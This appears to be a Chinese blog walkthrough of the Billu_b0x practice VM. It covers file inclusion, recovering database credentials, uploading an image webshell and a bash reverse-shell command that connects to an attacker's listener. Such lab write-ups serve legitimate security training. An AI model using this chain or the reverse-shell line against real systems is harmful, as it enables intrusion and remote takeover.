当前位置: 首页 > news >正文

Billu_b0x靶机实战攻略

1.安装并开启靶机

2.获取靶机IP 

3.浏览器访问靶机 

4.获取敏感目录 

5.访问目录

http://192.168.40.143/in            可能存在文件包含漏洞

http://192.168.40.143/add           尝试上传无反应

http://192.168.40.143/test             尝试文件包含

尝试改用POST传参,包含成功

查看c.php,发现了疑似数据库用户名密码及库名 

http://192.168.40.143/phpmy/                尝试登录数据库,登陆成功

 发现用户名密码,尝试登录最初页面,登陆成功

发现文件上传节点

6.制作图片马并上传

新建2.asp写入一句话木马 

打开cmd,切换到 1.jpg 和 2.asp 文件目录下,制作图片马 

上传成功

点击continue,用BP抓包

 

7.反弹shell 

echo "bash -i >& /dev/tcp/192.168.40.133/8888 0>&1" | bash

进行url编码,同时打开Kali监听

将转码复制在 cmd= 后,反弹 shell 

反弹shell成功 

http://www.dtcms.com/a/75940.html

相关文章:

  • JS逆向案例-HIKVISION-视频监控的前端密码加密分析
  • 分享一个项目中遇到的一个算法题
  • SPI 总线协议
  • Pytest项目_day01(HTTP接口)
  • 微服务即时通信系统---(五)框架学习
  • 【Spring】第四弹:基于XML文件注入Bean对象
  • IDEA2022自动构建注册表没有compiler.automake.allow.when.app.running选项解决方法
  • 【HarmonyOS Next】常见的字节转换
  • 激光slam学习笔记10---ubuntu2004部署运行fastlivo2踩坑记录
  • Web 小项目: 网页版图书管理系统
  • 速盾:如何利用CDN静态加速匹配尾缀提升网站性能?
  • 判断是不是完全二叉树(C++)
  • 【小白调试电路板】
  • 剑指 Offer II 109. 开密码锁
  • SpringBoot-MVC配置类与 Controller 的扫描
  • keepalived应用
  • Day19:把数字翻译成字符串
  • 蓝桥杯每日五题第一日
  • 计算机网络的框架结构
  • 每日一题--计算机网络
  • Maven常见问题汇总
  • 【C++内存管理】
  • 教材与课程的协同-以计算机网络专业为例
  • CopyOnWriteArrayList 和 CopyOnWriteArraySet对比
  • rclone工具迁移minio数据
  • 【JAVA】】深入浅出了解cookie、session、jwt
  • Lora微LLAMA模型实战
  • 相机光学(四十七)——相纸材质
  • 博客迁移----宝塔面板一键迁移遇到问题
  • CSV加密代码分析